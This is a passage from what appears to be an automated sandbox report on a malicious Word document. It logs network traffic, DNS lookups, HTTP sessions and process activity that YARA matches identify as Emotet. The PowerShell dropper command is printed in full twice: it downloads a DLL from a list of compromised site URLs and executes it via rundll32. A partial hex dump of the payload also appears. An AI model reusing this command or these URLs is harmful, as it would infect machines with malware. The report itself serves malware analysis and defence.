Nov 22, 2021 11:01:49.865339041 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.865366936 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.865458012 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.868581057 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.871985912 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.872380972 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.997756004 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.997831106 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.997863054 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.997910023 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.997989893 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998480082 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998543978 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998553991 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.998580933 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998619080 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.998625040 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998719931 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:49.998759031 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998821020 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998857021 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:49.998888969 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:50.161813021 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:54.674596071 CET	80	49753	50.62.141.15	192.168.2.5
Nov 22, 2021 11:01:54.674676895 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:01:54.692222118 CET	49753	80	192.168.2.5	50.62.141.15
Nov 22, 2021 11:03:15.249524117 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.249574900 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.249691010 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.281486988 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.281518936 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.399688005 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.399821997 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.755220890 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.755253077 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.755717993 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.755789995 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.758641958 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.800883055 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.878082037 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.878190041 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.878201008 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.878252029 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.917922974 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.917963982 CET	443	49794	51.178.61.60	192.168.2.5
Nov 22, 2021 11:03:15.917977095 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.918030024 CET	49794	443	192.168.2.5	51.178.61.60
Nov 22, 2021 11:03:15.990545988 CET	49795	80	192.168.2.5	168.197.250.14
Nov 22, 2021 11:03:16.249416113 CET	80	49795	168.197.250.14	192.168.2.5
Nov 22, 2021 11:03:16.825442076 CET	49795	80	192.168.2.5	168.197.250.14
Nov 22, 2021 11:03:17.084369898 CET	80	49795	168.197.250.14	192.168.2.5
Nov 22, 2021 11:03:17.591124058 CET	49795	80	192.168.2.5	168.197.250.14
Nov 22, 2021 11:03:17.849941969 CET	80	49795	168.197.250.14	192.168.2.5
Nov 22, 2021 11:03:17.858302116 CET	49796	8080	192.168.2.5	45.79.33.48
Nov 22, 2021 11:03:20.872549057 CET	49796	8080	192.168.2.5	45.79.33.48
Nov 22, 2021 11:03:26.873044014 CET	49796	8080	192.168.2.5	45.79.33.48

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 11:01:44.435177088 CET	62176	53	192.168.2.5	8.8.8.8
Nov 22, 2021 11:01:44.455148935 CET	53	62176	8.8.8.8	192.168.2.5
Nov 22, 2021 11:01:48.124186993 CET	59596	53	192.168.2.5	8.8.8.8
Nov 22, 2021 11:01:48.143806934 CET	53	59596	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 22, 2021 11:01:44.435177088 CET	192.168.2.5	8.8.8.8	0xfeff	Standard query (0)	thepilatesstudionj.com	A (IP address)	IN (0x0001)
Nov 22, 2021 11:01:48.124186993 CET	192.168.2.5	8.8.8.8	0x45b0	Standard query (0)	alfaofarms.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 22, 2021 11:01:44.455148935 CET	8.8.8.8	192.168.2.5	0xfeff	No error (0)	thepilatesstudionj.com		72.167.40.83	A (IP address)	IN (0x0001)
Nov 22, 2021 11:01:48.143806934 CET	8.8.8.8	192.168.2.5	0x45b0	No error (0)	alfaofarms.com		50.62.141.15	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

51.178.61.60

thepilatesstudionj.com

alfaofarms.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49794	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49752	72.167.40.83	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2021 11:01:44.759536028 CET	1051	OUT	GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: thepilatesstudionj.com Connection: Keep-Alive
Nov 22, 2021 11:01:44.974144936 CET	1051	IN	HTTP/1.1 500 Internal Server Error Date: Mon, 22 Nov 2021 10:01:44 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Nov 22, 2021 11:01:44.979284048 CET	1052	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49753	50.62.141.15	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2021 11:01:48.313236952 CET	1052	OUT	GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: alfaofarms.com Connection: Keep-Alive
Nov 22, 2021 11:01:48.488010883 CET	1054	IN	HTTP/1.1 200 OK Date: Mon, 22 Nov 2021 10:01:48 GMT Server: Apache X-Powered-By: PHP/7.4.24 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Mon, 22 Nov 2021 10:01:48 GMT Content-Disposition: attachment; filename="SfN3LqRRI1423e.dll" Content-Transfer-Encoding: binary Set-Cookie: 619b6a8c643b1=1637575308; expires=Mon, 22-Nov-2021 10:02:48 GMT; Max-Age=60; path=/ Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Mon, 22 Nov 2021 10:01:48 GMT Keep-Alive: timeout=5 Transfer-Encoding: chunked Content-Type: application/x-msdownload Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 08 4c 96 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 10 00 94 03 00 00 de 03 00 00 00 00 00 26 58 01 00 00 10 00 00 00 b0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 07 00 00 04 00 00 86 15 08 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 d7 04 00 c0 05 00 00 d0 dc 04 00 b4 00 00 00 00 20 05 00 10 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 07 00 a0 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 98 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 93 03 00 00 10 00 00 00 94 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 3c 01 00 00 b0 03 00 00 3e 01 00 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 25 00 00 00 f0 04 00 00 18 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 44 02 00 00 20 05 00 00 46 02 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a0 33 00 00 00 70 07 00 00 34 00 00 00 34 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELLa!&X@ Dp3@.text `.rdata<>@@.data,%@.rsrcD F@@.reloc3p44@B
Nov 22, 2021 11:01:48.488051891 CET	1055	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2021 11:01:48.488082886 CET	1056	IN	Data Raw: cc cc cc cc cc cc cc b8 4a fc ff ff c2 10 00 cc cc cc cc cc cc cc cc b8 34 ff ff ff c2 10 00 cc cc cc cc cc cc cc cc b8 2a 03 00 00 c2 10 00 cc cc cc cc cc cc cc cc b8 3a ff ff ff c2 10 00 cc cc cc cc cc cc cc cc b8 9b 02 00 00 c2 10 00 cc cc cc Data Ascii: J4*:{."^
Nov 22, 2021 11:01:48.488152027 CET	1058	IN	Data Raw: 83 c4 08 c7 06 74 b4 03 10 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec f6 45 08 01 56 8b f1 c7 06 28 b4 03 10 74 0b 6a 04 56 e8 c1 33 01 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec Data Ascii: t^]UEV(tjV3^]U3EV>u&jMC>u0A0MCM3^O3]AAD(UjhdP
Nov 22, 2021 11:01:48.488785028 CET	1059	IN	Data Raw: 89 45 d0 8d 45 c0 0f 43 45 c0 03 f0 56 e8 b1 7d 01 00 83 c4 0c c6 46 02 00 eb 11 c6 45 bc 00 8d 4d c0 ff 75 bc 6a 02 e8 77 30 00 00 8b 4d dc ff 75 e0 8b 01 8d 55 a4 52 ff 50 08 c6 45 fc 01 8d 4d a4 83 7d b8 10 8b 55 d0 0f 43 4d a4 8b 45 d4 8b 7d Data Ascii: EECEV}FEMujw0MuURPEM}UCME}+UWQ;w)}u:CuEPK}M7EMuW0Ur,MBrI#+RQ-MMu~EfEW}f~f
Nov 22, 2021 11:01:48.488817930 CET	1061	IN	Data Raw: 89 03 83 c3 04 89 5d e8 eb 16 8d 45 e0 50 53 8d 4d e4 e8 72 25 00 00 8b 7d ec 8b 5d e8 8b 45 e0 40 89 45 e0 83 f8 05 7c d3 ba 90 89 04 10 89 7d e0 b9 70 0a 05 10 e8 ee 21 00 00 8b 75 e4 8b cb 2b ce c1 f9 02 51 8b c8 e8 ac 01 00 00 50 e8 86 24 00 Data Ascii: ]EPSMr%}]E@E\|}p!u+QP$3p!W)!4PM$G\|};t5@fpq!6P$;uMt)+rI#+
Nov 22, 2021 11:01:48.488864899 CET	1062	IN	Data Raw: 8b ec 6a ff 68 30 90 03 10 64 a1 00 00 00 00 50 51 56 a1 08 f0 04 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 e8 23 4f 01 00 84 c0 75 07 8b 0e e8 0a 1a 00 00 c7 45 fc 00 00 00 00 8b 0e 8b 01 8b 40 04 8b 4c 08 38 85 c9 74 05 8b 01 ff 50 08 8b 4d Data Ascii: jh0dPQV3PEd#OuE@L8tPMdY^]UjhXdPQVW3PEd}u7BL08tPEJ\|1uL1<t;t@\|0GMdY
Nov 22, 2021 11:01:48.488902092 CET	1063	IN	Data Raw: c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd e8 e4 1e 01 00 8b e5 5d c2 1c 00 e8 a5 c0 01 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 54 a1 08 f0 04 10 33 c4 89 44 24 50 53 8b 5d 08 8d 44 24 08 56 Data Ascii: MdY_^M3]UT3D$PS]D$VuWu uvhPWPD$$j@PhPD$PuVuuSWL$\| _^[3U]UT3D$PS]D$VuWu uvhPWPD
Nov 22, 2021 11:01:48.488956928 CET	1065	IN	Data Raw: 00 8b 7d f8 83 c4 0c 8b 45 f4 c6 04 3b 00 83 f8 10 72 29 8d 48 01 8b 06 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 19 8b c2 51 50 e8 9d 19 01 00 83 c4 08 89 3e 8b c6 5f 5e 5b 8b e5 5d c2 08 00 e8 43 bb 01 00 e8 38 1f 00 Data Ascii: }E;r)HrP#+wQP>_^[]C8UQUuy8EP]UEV(tjV1^]UQVuWyFFAu+QRM_^]
Nov 22, 2021 11:01:48.489039898 CET	1066	IN	Data Raw: ff ff ff 8b 45 ac 8b 5d e8 83 78 24 00 8b 78 20 7c 0e 7f 04 85 ff 74 08 3b fb 76 04 2b fb eb 02 33 ff 8b 40 14 25 c0 01 00 00 83 f8 40 0f 84 97 00 00 00 3d 00 01 00 00 74 48 57 ff 75 1c 8d 45 b4 ff 75 14 ff 75 10 50 ff 75 08 e8 61 fc ff ff 8b c8 Data Ascii: E]x$x \|t;v+3@%@=tHWuEuuPua3}VEAEECEPqE1Pu0j}EVCEPuEuPuWuEAEEq1Pu03"}EVCEPuEuPuH}
Nov 22, 2021 11:01:48.655143023 CET	1068	IN	Data Raw: e4 83 78 24 00 8b 78 20 7c 0e 7f 04 85 ff 74 08 3b fb 76 04 2b fb eb 02 33 ff 8b 40 14 25 c0 01 00 00 83 f8 40 0f 84 99 00 00 00 3d 00 01 00 00 74 4b 57 ff 75 1c 8d 45 ac ff 75 14 ff 75 10 50 ff 75 08 e8 2f f7 ff ff 8b 75 b4 8b c8 33 ff 83 7d e8 Data Ascii: x$x \|t;v+3@%@=tKWuEuuPu/u3}VEAEECEPqE1Pu0l}EuCERPuEuPVZWuEAEEq1PV03"}ERCEPuEuPuu}M

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49794	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-22 10:03:15 UTC	OUT	GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1 Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0= Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-22 10:03:15 UTC	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 22 Nov 2021 10:03:15 GMT Content-Type: text/html Content-Length: 162 Connection: close
2021-11-22 10:03:15 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 4228 Parent PID: 792

General

Start time:	11:01:11
Start date:	22/11/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xbd0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6324 Parent PID: 4228

General

Start time:	11:01:17
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6368 Parent PID: 556

General

Start time:	11:01:17
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6404 Parent PID: 6324

General

Start time:	11:01:17
Start date:	22/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6468 Parent PID: 6324

General

Start time:	11:01:18
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Imagebase:	0xc20000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6632 Parent PID: 556

General

Start time:	11:01:27
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6780 Parent PID: 556

General

Start time:	11:01:29
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6876 Parent PID: 556

General

Start time:	11:01:30
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 6940 Parent PID: 556

General

Start time:	11:01:31
Start date:	22/11/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff715d40000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6960 Parent PID: 556

General

Start time:	11:01:31
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4896 Parent PID: 6468

General

Start time:	11:01:51
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Imagebase:	0xe00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3728 Parent PID: 4896

General

Start time:	11:02:12
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
Imagebase:	0xe00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7060 Parent PID: 3728

General

Start time:	11:02:29
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
Imagebase:	0xe00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 1700 Parent PID: 6960

General

Start time:	11:02:32
Start date:	22/11/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7ae4c0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 3940 Parent PID: 1700

General

Start time:	11:02:33
Start date:	22/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4864 Parent PID: 556

General

Start time:	11:02:39
Start date:	22/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
